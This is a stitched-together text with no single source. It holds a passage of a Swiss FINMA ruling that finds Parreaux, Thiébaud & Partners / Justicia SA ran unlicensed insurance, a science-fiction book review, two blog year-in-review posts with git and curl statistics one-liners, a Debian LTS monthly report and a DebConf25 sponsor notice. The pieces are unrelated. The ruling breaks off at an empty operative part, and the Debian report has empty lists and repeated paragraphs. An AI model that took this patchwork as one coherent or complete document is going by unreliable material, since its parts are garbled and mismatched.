(59) In this case, the purpose of the legal subscriptions offered by Parreaux, Thiébaud & Partners / Justicia SA is the transfer of a risk from the clients to Parreaux, Thiébaud & Partners / Justicia SA. Indeed, when the client concludes a legal subscription, Parreaux, Thiébaud & Partners / Justicia SA assumes the risk of having to provide legal services and bear administrative costs, respectively lawyers' fees, court fees or expert fees incurred by legal matters. When a client reports a claim, Parreaux, Thiébaud & Partners / Justicia SA bears the risk and therefore the financial consequences arising from the need for legal assistance in question. In cases where there is a claim prior to the conclusion of the subscription, Parreaux, Thiébaud & Partners / Justicia SA will cover 50% of the costs for this claim, but will continue to bear the risk for any future disputes that may arise during the term of the subscription. In this sense, Parreaux, Thiébaud & Partners / Justicia SA provide services that go beyond those offered by traditional legal protection insurance, which, however, has no influence on the existence of an uncertain risk transferred to Parreaux, Thiébaud & Partners / Justicia SA upon conclusion of the subscription. Furthermore, it was found during the investigation that, in at least one case, Parreaux, Thiébaud & Partners covered the fees without entering into a loan agreement with the client; it was therefore not provided for these advances to be repaid, contrary to what was provided for in the general terms and conditions of Parreaux, Thiébaud & Partners. Furthermore, it could not be established that the new wording of the general terms and conditions of Justicia SA providing for the repayment of the loan regardless of the outcome of the proceedings had been implemented. To date, no loan has been repaid.
These elements allow us to conclude that the risk of having to pay for legal services and advances on fees are borne by Parreaux, Thiébaud & Partners and Justicia SA in place of the clients. Finally, in accordance with the case law of the Federal Court, even if the loan granted by Justicia SA is accompanied by an obligation to repay, the simple fact of bearing the risk of insolvency of its clients is sufficient to justify the classification of insurance risk.
(60) The insured's benefit (the premium) and the insurance benefit: In order to qualify a contract as an insurance contract, it is essential that the policyholder's obligation to pay the premiums is offset by an obligation on the part of the insurer to provide benefits. The insured must therefore be entitled to the insurer's benefit at the time of the occurrence of the insured event [11]. To date, the Federal Court has not ruled on the question of whether the promise to provide a service (assistance, advice, etc.) constitutes an insurance benefit. However, recent doctrine shows that the provision of services can also be considered as insurance benefits. Furthermore, this position is confirmed and defended by the Federal Council with regard to legal protection insurance, which it defined in Art. 161 OS as follows: "By the legal protection insurance contract, the insurance company undertakes, against payment of a premium, to reimburse the costs incurred by legal matters or to provide services in such matters" [12].
(61) In this case, when a client enters into a legal subscription contract with Parreaux, Thiébaud & Partners/Justicia SA, he agrees to pay an annual premium which then allows him to have access to a catalogue of services depending on the subscription chosen. Parreaux, Thiébaud & Partners/Justicia SA undertakes for their part to provide legal assistance to the client if necessary, provided that the conditions for taking charge of the case are met. Parreaux, Thiébaud & Partners/Justicia SA leaves itself a wide margin of discretion in deciding whether it is a pre-existing case or whether the case has little chance of success. In these cases, the services remain partially covered, up to 50%. This approach is more generous than the practice of legal insurance companies on the market. In fact, pre-existing cases are not in principle covered by legal protection insurance and certain areas are also often excluded from the range of services included in the contract.
(62) The autonomous nature of the transaction: The autonomy of the transaction is essential to the insurance business, even though the nature of an insurance transaction does not disappear simply because it is linked in the same agreement to services of another type. In order to determine whether the insurance service is presented simply as an ancillary agreement or a modality of the entire transaction, the respective importance of the two elements of the contract in the specific case must be taken into account and this must be assessed in the light of the circumstances [13].
(63) In this case, the obligation for Parreaux, Thiébaud & Partners/Justicia SA to provide legal services to clients who have subscribed to the subscriptions and to bear administrative costs, respectively lawyers' fees, court fees or expert fees does not represent a commitment that would be incidental or complementary to another existing contract or to another predominant service between Parreaux, Thiébaud & Partners/Justicia SA and the clients. On the contrary, the investigation showed that the legal subscriptions offered are autonomous contracts.
(64) Risk compensation based on statistical data: Finally, the case law requires, as another characteristic of the insurance business, that the company compensates the risks assumed in accordance with the laws of statistics. The requirements set by the Federal Court for this criterion are not always formulated uniformly in judicial practice. The Federal Court does not require a correct actuarial calculation but rather risk compensation based on statistical data [14]. Furthermore, it has specified that it is sufficient for the risk compensation to be carried out according to the law of large numbers and according to planning based on the nature of the business [15]. In another judgment [16], the Federal Court adopted a different approach and considered that the criterion of risk compensation based on statistical data is met when the income from the insurance business allows expenses to be covered while leaving a safety margin. Finally, in another judgment [17], the High Court deduced from the fact that the products were offered to an indeterminate circle of people that the risks would be logically distributed among all customers according to the laws of statistics and large numbers [18].
(65) In this case, the risks assumed by Parreaux, Thiébaud & Partners/Justicia SA are offset by the laws of statistics, at the very least by the compensation of risks according to the law of large numbers. Knowing that only a very small part of their clientele will use the services provided by Parreaux, Thiébaud & Partners/Justicia SA, the latter are counting on the fact that the income from the contributions from legal subscriptions will be used to cover the expenses incurred for clients whose cases must be handled by Parreaux, Thiébaud & Partners/Justicia SA while leaving a safety margin. Indeed, the analysis of the files revealed that when a client reports a case to Parreaux, Thiébaud & Partners/Justicia SA, the costs incurred to handle the case are at least three times higher than the contribution paid. Support in this proportion is only possible by assuming that only a few clients will need legal assistance and by ensuring that all contributions are used to cover these costs. (…).
(66) (…) The investigation, however, revealed that there is indeed an economic adequacy between the services provided to clients by Parreaux, Thiébaud & Partners / Justicia SA and the subscription fees it collects. In this way, Parreaux, Thiébaud & Partners / Justicia SA offsets its own risks, namely the costs related to the legal services it provides as well as the risk of not obtaining repayment of the loan granted to the client, by the diversification of risks that occurs when a large number of corresponding transactions are concluded, i.e. according to the law of large numbers. In view of the above, there is no doubt that the risk compensation criterion is met within the framework of the business model of Parreaux, Thiébaud & Partners / Justicia SA.
(69) (…) In view of the above, it is established that Parreaux, Thiébaud & Partners and Justicia SA have exercised, respectively exercise, an insurance activity within the meaning of Art. 2 para. 1 let. a in relation to Art. 3 para. 1 LSA and Art. 161 OS without having the required authorisation from FINMA. Indeed, upon conclusion of a subscription, clients can request legal services from Parreaux, Thiébaud & Partners/Justicia SA against payment of an annual premium. In addition to these services, the latter grant a loan to clients to cover legal costs and lawyers' fees. Although these loans are repayable "according to the agreed terms", none of these terms appear to exist in practice and no loan repayments have been recorded. Finally, the mere fact of bearing the risk of insolvency of clients is sufficient for the insurance risk criterion to be met. Furthermore, in view of the current number of legal subscription contracts held by Justicia SA, the turnover generated by its legal subscriptions and the fact that Justicia SA, and before it Parreaux, Thiébaud & Partners, offers its services to an unlimited number of persons, there are no special circumstances within the meaning of Art. 2 para. 3 LSA allowing Parreaux, Thiébaud & Partners and Justicia SA to be released from supervision under Art. 2 para. 1 LSA.
(…)
Operative part (dispositif)
Footnotes:

1. Federal Act on the Supervision of Insurance Companies (LSA; RS 961.01).
2. Art. 1 para. 2 LSA.
3. Art. 2 para. 1 let. a in relation to Art. 3 para. 1 LSA.
4. Art. 2 para. 3 LSA.
5. Art. 1 para. 1 let. a OS.
6. HEISS/MÖNNICH, in: Hsu/Stupp (eds.), Basler Kommentar, Versicherungsaufsichtsgesetz, Basel 2013, nos. 5 f. ad Art. 2 LSA and the references cited.
7. ATF 114 Ib 244 consid. 4.a and the references cited.
8. HEISS/MÖNNICH, op. cit., nos. 15 ff. ad Art. 2 LSA and the references cited.
9. HEISS/MÖNNICH, op. cit., nos. 5 f. ad Art. 2 LSA and the references cited.
10. TF 2C_410/2010 of 21 January 2011 consid. 3.2 and 4.2.
11. HEISS/MÖNNICH, op. cit., nos. 23 ff. ad Art. 2 LSA and the references cited.
12. HEISS/MÖNNICH, op. cit., nos. 26 ff. ad Art. 2 LSA and the references cited.
13. HEISS/MÖNNICH, op. cit., nos. 30 ff. ad Art. 2 LSA and the references cited.
14. ATF 107 Ib 54 consid. 5.
15. Ibid.
16. ATF 92 I 126, consid. 3.
17. TF 2C_410/2010 of 21 January 2010 consid. 3.4.
18. HEISS/MÖNNICH, op. cit., nos. 34 ff. ad Art. 2 LSA and the references cited.
Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stands alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book.
Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder.
Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem.
So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS.
"Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?"
"Oh, no, I am not missing this," Isla said, and got out of the podcar.
"I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened."
"And then?"
"And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun.
The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments.
We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well.
There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into.
There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts.
Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly.
This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended.
Followed by Ghostdrift.
Rating: 9 out of 10
Well, 2024 will be remembered, won't it? I guess 2025 already wants to make its mark too, but let's not worry about that right now, and instead let's talk about me.
A little over a year ago, I was gloating over how I had such a great blogging year in 2022, and was considering 2023 to be average, then went on to gather more stats and traffic analysis... Then I said, and I quote:
I hope to write more next year. I've been thinking about a few posts I could write for work, about how things work behind the scenes at Tor, that could be informative for many people. We run a rather old setup, but things hold up pretty well for what we throw at it, and it's worth sharing that with the world...
What a load of bollocks.
2024 was the second worst year ever in my blogging history, tied with 2009 at a measly 6 posts for the year:
anarcat@angela:anarc.at$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c | sort -nr | grep -v 2025 | tail -3
6 2024
6 2009
3 2014
I did write about my work though, detailing the migration from Gitolite to GitLab we completed that year. But after August, total radio silence until now.
It's not that I have nothing to say: I have no less than five drafts in my working tree here, not counting three actual drafts recorded in the Git repository:
anarcat@angela:anarc.at$ git s blog
## main...origin/main
?? blog/bell-bot.md
?? blog/fish.md
?? blog/kensington.md
?? blog/nixos.md
?? blog/tmux.md
anarcat@angela:anarc.at$ git grep -l '\!tag draft'
blog/mobile-massive-gallery.md
blog/on-dying.mdwn
blog/secrets-recovery.md
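(A side note for readers puzzled by `git s` above: it is a local alias, not a stock git command. Judging from the `## main...origin/main` header in the output, it is presumably something like the following, though the actual alias may differ:)

```shell
# Hypothetical alias reproducing the "## main...origin/main" output style
# seen above (an assumption, not necessarily the author's exact alias):
git config --global alias.s 'status --short --branch'
```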
I just don't have time to wrap those things up. I think part of me is disgusted by seeing my work stolen by large corporations to build proprietary large language models while my idols have been pushed to suicide for trying to share science with the world.
Another part of me wants to make those things just right. The "tagged drafts" above are nothing more than a huge pile of chaotic links, far from useful to anyone but me, and barely even then.
The on-dying article, in particular, is becoming my nemesis. I've been wanting to write that article for over 6 years now, I think. It's just too hard.
There's also the fact that I write for work already. A lot. Here are the top-10 contributors to our team's wiki:
anarcat@angela:help.torproject.org$ git shortlog --numbered --summary --group="format:%al" | head -10
4272 anarcat
423 jerome
117 zen
116 lelutin
104 peter
58 kez
45 irl
43 hiro
18 gaba
17 groente
... but that's a bit unfair, since I've been there half a decade. Here's the last year:
anarcat@angela:help.torproject.org$ git shortlog --since=2024-01-01 --numbered --summary --group="format:%al" | head -10
827 anarcat
117 zen
116 lelutin
91 jerome
17 groente
10 gaba
8 micah
7 kez
5 jnewsome
4 stephen.swift
So I still write the most commits! But to truly get a sense of the amount I wrote in there, we should count actual changes. Here it is by number of lines (from commandlinefu.com):
anarcat@angela:help.torproject.org$ git ls-files | xargs -n1 git blame --line-porcelain | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
99046 Antoine Beaupré
6900 Zen Fu
4784 Jérôme Charaoui
1446 Gabriel Filion
1146 Jerome Charaoui
837 groente
705 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
That, of course, is the entire history of the git repo, again. We should take only the last year into account, and probably ignore the tails directory, as sneaky Zen Fu imported the entire docs from another wiki there...
anarcat@angela:help.torproject.org$ find [d-s]* -type f -mtime -365 | xargs -n1 git blame --line-porcelain 2>/dev/null | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
75037 Antoine Beaupré
2932 Jérôme Charaoui
1442 Gabriel Filion
1400 Zen Fu
929 Jerome Charaoui
837 groente
702 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
Pretty good! 75k lines. But those are the files that were modified in the last year. If we go a little more nuts, we find that:
anarcat@angela:help.torproject.org$ git-count-words-range.py | sort -k6 -nr | head -10
parsing commits for words changes from command: git log '--since=1 year ago' '--format=%H %al'
anarcat 126116 - 36932 = 89184
zen 31774 - 5749 = 26025
groente 9732 - 607 = 9125
lelutin 10768 - 2578 = 8190
jerome 6236 - 2586 = 3650
gaba 3164 - 491 = 2673
stephen.swift 2443 - 673 = 1770
kez 1034 - 74 = 960
micah 772 - 250 = 522
weasel 410 - 0 = 410
I wrote 126,116 words in that wiki, only in the last year. I also deleted 37k words, so the final total is more like 89k words, but still: that's about forty (40!) articles of the average size (~2k) I wrote in 2022.
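Incidentally, a rough per-author tally of lines added in the last year can also be had with plain git, no custom parser required. A sketch (not the command I actually ran), attributing each file's additions to the commit author via `--numstat`:

```shell
# Rough per-author count of lines *added* in the last year, a sketch:
# --numstat emits "added<TAB>deleted<TAB>file" per file; we credit each
# file's additions to the commit's author (email local part, %al).
git log --since='1 year ago' --format='AUTHOR %al' --numstat |
  awk '/^AUTHOR/ { a = $2 }
       /^[0-9]/  { add[a] += $1 }
       END       { for (x in add) print add[x], x }' |
  sort -nr | head -10
```

Note this over-counts churn (a line rewritten ten times counts ten times), which is one reason word-level diffs are more honest.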
(And yes, I did go nuts and write a new log parser, essentially from scratch, to figure out those word diffs. I did get the courage only after asking GPT-4o for an example first, I must admit.)
Let's celebrate that again: I wrote 90 thousand words in that wiki in 2024. According to Wikipedia, a "novella" is 17,500 to 40,000 words, which would mean I wrote about a novella and a novel, in the past year.
But interestingly, if I look at the repository analytics, I certainly didn't write that much more in the past year than before. So that alone cannot explain the lull in my production here.
Another part of me is just tired of the bickering and arguing on the internet. I have at least two articles in there that I suspect are going to get me a lot of push-back (NixOS and Fish). I know how to deal with this: you need to write well, consider the controversy, spell it out, and defuse things before they happen. But that's hard work and, frankly, I don't really care that much about what people think anymore.
I'm not writing here to convince people. I stopped evangelizing a long time ago. Now, I'm more into documenting, and teaching. And, while teaching, there's a two-way interaction: when you give a talk or workshop, people can ask questions, or respond, and you all learn something. When you document, you quickly get told "where is this? I couldn't find it" or "I don't understand this" or "I tried that and it didn't work" or "wait, really? shouldn't we do X instead", and you learn.
Here, it's static. It's my little soapbox where I scream in the void. The only thing people can do is scream back.
So.
Let's see if we can work together here.
If you don't like something I say, disagree, or find something wrong or to be improved, instead of screaming on social media or ignoring me, try contributing back. This site here is backed by a git repository and I promise to read everything you send there, whether it is an issue or a merge request.
I will, of course, still read comments sent by email or IRC or social media, but please, be kind.
You can also, of course, follow the latest changes on the TPA wiki. If you want to catch up with the last year, some of the "novellas" I wrote include:
torproject.org
(Well, no, you can't actually follow changes on a GitLab wiki. But we have a wiki-replica git repository where you can see the latest commits, and subscribe to the RSS feed.)
See you there!
So this blog is now celebrating its 21st birthday (or 20 if you count from zero, or 18 if you want to be pedantic), and I figured I would do this yearly thing of reviewing how that went.
2022 was the official 20th anniversary in any case, and that was one of my best years on record, with 46 posts, surpassed only by the noisy 2005 (62) and matching 2006 (46). 2023, in comparison, was underwhelming: a feeble 11 posts! What happened!
Well, I was busy with other things, mostly away from keyboard, that I will not bore you with here...
The other thing that happened is that the one-liner I used to collect stats was broken (it counted folders and other unrelated files) and wildly overestimated 2022! Turns out I didn't write that much then:
anarc.at$ ls blog | grep '^[0-9][0-9][0-9][0-9].*.md' | sed s/-.*// | sort | uniq -c | sort -n -k2
57 2005
43 2006
20 2007
20 2008
7 2009
13 2010
16 2011
11 2012
13 2013
5 2014
13 2015
18 2016
29 2017
27 2018
17 2019
18 2020
14 2021
28 2022
10 2023
1 2024
But even that is inaccurate because, in ikiwiki, I can tag any page as being featured on the blog. So we actually need to process the HTML itself, because we don't have anything better on hand short of going through ikiwiki's internals:
anarcat@angela:anarc.at$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c
56 2005
42 2006
19 2007
18 2008
6 2009
12 2010
15 2011
10 2012
11 2013
3 2014
15 2015
32 2016
50 2017
37 2018
19 2019
19 2020
15 2021
28 2022
13 2023
Which puts the top 10 years at:
$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c | sort -nr | head -10
56 2005
50 2017
42 2006
37 2018
32 2016
28 2022
19 2020
19 2019
19 2007
18 2008
Anyway. 2023 was certainly not a glorious year in that regard.
In terms of visits, however, we had quite a few hits. According to Goatcounter, I had 122 300 visits in 2023! 2022, in comparison, had 89 363, so that's quite a rise.
I seem to have hit the Hacker News front page at least twice. I say "seem" because it's actually pretty hard to tell what the HN front page actually is on any given day. I had 22k visits on 2023-03-13, in any case, and you can't see me on the front page for that day. We do see a post of mine on 2023-09-02, all the way down there, which seems to have generated another 10k visits.
In any case, here were the most popular stories for you fine visitors:
Framework 12th gen laptop review: 24k visits, which is surprising for a 13k-word article "without images", as some critics have complained. 15k referred by Hacker News. Good reference and time-consuming benchmarks, slowly bit-rotting.
That is, by far, my most popular article ever. A popular article in 2021 or 2022 was around 6k to 9k, so that's a big one. I suspect it will keep getting traffic for a long while.
Calibre replacement considerations: 15k visits, most of which without a referrer. Was actually an old article, but I suspect HN brought it back to light. I keep updating that wiki page regularly when I find new things, but I'm still using Calibre to import ebooks.
Hacking my Kobo Clara HD: not new, but it keeps gathering more and more hits: 1,800 in its first year, 4,600 last year, and now 6,400 visitors to the blog! Not directly related, but the iFixit battery replacement guide I wrote also seems to be quite popular.
Everything else was published before 2023. Replacing Smokeping with Prometheus is still around and Looking at Wayland terminal emulators makes an entry in the top five.
People send less and less private information when they browse the web. The number of visitors without referrers was 41% in 2021; it rose to 44% in 2023. Most of the remaining traffic comes from Google, but Hacker News is now a significant chunk, almost as big as Google.
In 2021, Google represented 23% of my traffic; in 2022, it was down to 15%, so 18% is actually a rise from last year, even if it seems much smaller than what I usually think of.
Ratio | Referrer | Visits |
---|---|---|
18% | Google | 22 098 |
13% | Hacker News | 16 003 |
2% | duckduckgo.com | 2 640 |
1% | community.frame.work | 1 090 |
1% | missing.csail.mit.edu | 918 |
Note that Facebook and Twitter do not appear at all in my referrers.
Unsurprisingly, most visits still come from the US:
Ratio | Country | Visits |
---|---|---|
26% | United States | 32 010 |
14% | France | 17 046 |
10% | Germany | 11 650 |
6% | Canada | 7 425 |
5% | United Kingdom | 6 473 |
3% | Netherlands | 3 436 |
Those ratios are nearly identical to last year, but quite different from 2021, where Germany and France were more or less reversed.
Back in 2021, I mentioned there was a long tail of countries with at least one visit, with 160 countries listed. I expanded that, and there are now 182 countries in that list, almost all of the 193 member states of the UN.
Chrome's dominance continues to expand, even on readers of this blog, gaining two percentage points from Firefox compared to 2021.
Ratio | Browser | Visits |
---|---|---|
49% | Firefox | 60 126 |
36% | Chrome | 44 052 |
14% | Safari | 17 463 |
1% | Others | N/A |
Unfortunately, it seems my Lynx and Haiku users have not visited in the past year. Trying to read those metrics is like reading tea leaves...
In terms of operating systems:
Ratio | OS | Visits |
---|---|---|
28% | Linux | 34 010 |
23% | macOS | 28 728 |
21% | Windows | 26 303 |
17% | Android | 20 614 |
10% | iOS | 11 741 |
Again, Linux and Mac are over-represented, and Android and iOS are under-represented.
I hope to write more next year. I've been thinking about a few posts I could write for work, about how things work behind the scenes at Tor, that could be informative for many people. We run a rather old setup, but things hold up pretty well for what we throw at it, and it's worth sharing that with the world...
So anyway, thanks for coming, faithful reader, and see you in the coming 2024 year...
This was my hundred-and-twenty-seventh month of doing some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:
As new CVEs for ffmpeg appeared, I resumed work on an update of this package
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on:
As new CVEs for ffmpeg appeared, I resumed work on an update of this package
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
This month I uploaded new packages or new upstream or bugfix versions of:
This work is generously funded by Freexian!
This month I uploaded new packages or new upstream or bugfix versions of:
This work is generously funded by Freexian!
This month I uploaded new packages or new upstream or bugfix versions of:
Patrick, our Outreachy intern for the Debian Astro project, is doing very well, working through task after task. He is working on automatic updates of the indi 3rd-party drivers, and maybe the results of his work will already be part of Trixie.
Unfortunately I didn’t find any time to work on this topic.
This month I uploaded new packages or new upstream or bugfix versions of:
This month I uploaded new upstream or bugfix versions of:
This month I accepted 385 and rejected 37 packages. The overall number of packages that got accepted was 402.
08 February, 2025 06:41PM by alteholz
We are pleased to announce that Proxmox has committed to sponsor DebConf25 as a Platinum Sponsor.
Proxmox develops powerful, yet easy-to-use Open Source server software. The product portfolio from Proxmox, including server virtualization, backup, and email security, helps companies of any size, sector, or industry to simplify their IT infrastructures. The Proxmox solutions are based on the great Debian platform, and we are happy that we can give back to the community by sponsoring DebConf25.
With this commitment as Platinum Sponsor, Proxmox is contributing to the annual Debian Developers' Conference, directly supporting the progress of Debian and Free Software. Proxmox helps strengthen the community that collaborates on Debian projects from all around the world, throughout the year.
Thank you very much, Proxmox, for your support of DebConf25!
DebConf25 will take place from 14 to 20 July 2025 in Brest, France, and will be preceded by DebCamp, from 7 to 13 July 2025.
DebConf25 is accepting sponsors! Interested companies and organizations may contact the DebConf team through sponsors@debconf.org, and visit the DebConf25 website at https://debconf25.debconf.org/sponsors/become-a-sponsor/.
06 February, 2025 10:50AM by Sahil Dhiman